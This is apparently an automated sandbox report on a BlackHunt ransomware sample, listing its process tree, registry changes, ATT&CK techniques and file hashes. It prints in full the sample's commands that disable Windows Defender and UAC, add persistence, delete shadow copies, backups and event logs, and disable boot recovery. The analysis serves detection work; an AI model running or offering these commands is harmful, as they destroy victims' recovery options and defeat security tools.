eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 49 PID 1108 wrote to memory of 2632 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 49 PID 1108 wrote to memory of 2640 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 50 PID 1108 wrote to memory of 2640 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 50 PID 1108 wrote to memory of 2640 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 50 PID 1108 wrote to memory of 2640 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 50 PID 1108 wrote to memory of 2500 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 55 PID 1108 wrote to memory of 2500 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 55 PID 1108 wrote to memory of 2500 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 55 PID 1108 wrote to memory of 2500 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 55 PID 1108 wrote to memory of 1112 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 57 PID 1108 wrote to memory of 1112 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 57 PID 1108 wrote to memory of 1112 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 57 PID 1108 wrote to memory of 1112 1108 eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe 57 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe"C:\Users\Admin\AppData\Local\Temp\eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1108 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1736 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2940
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:1184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:1420
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2804
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2840
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2632
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2860
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2640
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:2872
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:2252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1112
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3032
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2108
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2756
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2528
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:2584
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1164
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2844
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1712
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:2736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2916
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:3004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3048
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe" /F2⤵PID:844
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe" /F3⤵
- Creates scheduled task(s)
PID:2784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1900
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1796
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:1452
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1676
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1476
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1492
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:564
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:2408
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:572
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:3844
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:1148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3828
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:3228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:2388
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2768
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:2296
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2972
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:236
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2244
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:3256
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3360
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:3656
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3660
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:3420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3732
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\eb8586c746ab079f6e9ccead6ab1307822e72dfd37f0aa4bcf333b5841d4e5fb.exe"2⤵
- Deletes itself
PID:204 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:1772
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:1896
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:3076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1676
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:3512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1436
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:3436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:212
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1488
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:2904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3032
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:3396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3780
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3424
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:884
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:608
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:644
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵
- Modifies registry class
PID:2876
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:564
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD51dda8a37c92304ca4903984f59fdaf8a
SHA1c22cb4e6f9d425671314f036c2119b9591bdead8
SHA25603a6f806b41c69a502fd821bc870365129dd40a85c99241d824c251c4c7c23da
SHA512dff708049aa47384db77ce9b6468b24d287f06cda1e9447e94c6a2f641fb453abe1191bb18b02289faea5b9fe946ac6c9444f2c9a70b5dd09c2627089aed31ee
-
Filesize
12KB
MD550d73b9eb01dc2dc0215ac3909db6f89
SHA17b7cc506a38710250f17605f18b518cec376b8bf
SHA25695ba9feec1305ad6808d55fc68712b9bb5c2d8c165d54506551ea2a0104718f6
